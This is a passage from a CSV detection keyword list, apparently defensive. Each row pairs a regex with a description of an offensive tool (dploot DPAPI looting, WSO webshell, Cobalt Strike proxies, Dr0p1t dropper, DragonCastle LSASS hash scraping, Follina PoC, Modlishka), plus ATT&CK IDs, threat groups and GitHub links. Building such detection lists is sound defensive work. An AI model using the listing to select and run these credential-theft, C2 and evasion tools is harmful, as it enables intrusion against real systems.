"*dploot.lib.smb*",".{0,1000}dploot\.lib\.smb.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41544"
"*dploot.triage.*",".{0,1000}dploot\.triage\..{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41545"
"*dploot.triage.sccm import SCCMTriage*",".{0,1000}dploot\.triage\.sccm\simport\sSCCMTriage.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41546"
"*dploot/releases/download/*/dploot*",".{0,1000}dploot\/releases\/download\/.{0,1000}\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41547"
"*dploot_linux_adm64*",".{0,1000}dploot_linux_adm64.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","#linux","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41548"
"*dploot-main.zip*",".{0,1000}dploot\-main\.zip.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41549"
"*DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd*",".{0,1000}DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#content","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","41551"
"*DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI*",".{0,1000}DQoNCiAgICwuICAgKCAgIC4gICAgICApICAgICAgICAgICAgICAgIiAgICAgICAgICAgICwuICAgKCAgI.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","41552"
"*dr0op/CrossNet*",".{0,1000}dr0op\/CrossNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","41553"
"*Dr0p1t-Framework*",".{0,1000}Dr0p1t\-Framework.{0,1000}","offensive_tool_keyword","Dr0p1t-Framework","Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks ( Trust me :D ) .)","T1203 - T1005 - T1064","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/D4Vinci/Dr0p1t-Framework","1","1","N/A","N/A","N/A","10","1409","377","2018-11-03T19:00:12Z","2017-02-11T21:24:11Z","41554"
"*dr4k0nia/NixImports*",".{0,1000}dr4k0nia\/NixImports.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","41555"
"*DragonCastle - @TheXC3LL*",".{0,1000}DragonCastle\s\-\s\@TheXC3LL.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","41556"
"*DragonCastle.dll*",".{0,1000}DragonCastle\.dll.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","41557"
"*dragoncastle.py -*",".{0,1000}dragoncastle\.py\s\-.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","41558"
"*DReverseProxy.git*",".{0,1000}DReverseProxy\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","41559"
"*DReverseServer.go*",".{0,1000}DReverseServer\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","41560"
"*drgreenthumb93/CVE-2022-30190-follina*",".{0,1000}drgreenthumb93\/CVE\-2022\-30190\-follina.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","N/A","1","8","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z","41561"
"*DriverQuery.exe no-msft*",".{0,1000}DriverQuery\.exe\sno\-msft.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","41562"
"*drk1wi/Modlishka*",".{0,1000}drk1wi\/Modlishka.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow.  which allows to transparently proxy multi-domain destination traffic.  both TLS and non-TLS.  over a single domain.  without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","41563"
"*droopescan scan drupal -u * -t 32*",".{0,1000}droopescan\sscan\sdrupal\s\-u\s.{0,1000}\s\-t\s32.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41564"
"*Droopscan*",".{0,1000}Droopscan.{0,1000}","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","EMBER BEAR","Vulnerability Scanner","https://github.com/droope/droopescan","1","0","N/A","N/A","N/A","10","1328","259","2024-01-19T19:58:03Z","2014-10-22T22:06:30Z","41565"
"*drop_malleable_unknown_*",".{0,1000}drop_malleable_unknown_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41566"
"*drop_malleable_with_invalid_*",".{0,1000}drop_malleable_with_invalid_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41567"
"*drop_malleable_without_*",".{0,1000}drop_malleable_without_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41568"
"*dropboxC2.py*",".{0,1000}dropboxC2\.py.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","41572"
"*dropper_cs.exe*",".{0,1000}dropper_cs\.exe.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","41573"
"*dropper32.exe*",".{0,1000}dropper32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41574"
"*dropper64.exe*",".{0,1000}dropper64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","41575"
"*drops a netcat?? undetectable by antivirus*",".{0,1000}drops\sa\snetcat\?\?\sundetectable\sby\santivirus.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","41576"
"*DRSAT has injected hooks into process *",".{0,1000}DRSAT\shas\sinjected\shooks\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#content","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","41577"
"*drunkpotato.x64.dll*",".{0,1000}drunkpotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41578"
"*drunkpotato.x86.dll*",".{0,1000}drunkpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41579"
"*drupal_enum.py*",".{0,1000}drupal_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","41580"
"*drupwn --mode exploit --target *",".{0,1000}drupwn\s\-\-mode\sexploit\s\-\-target\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41581"
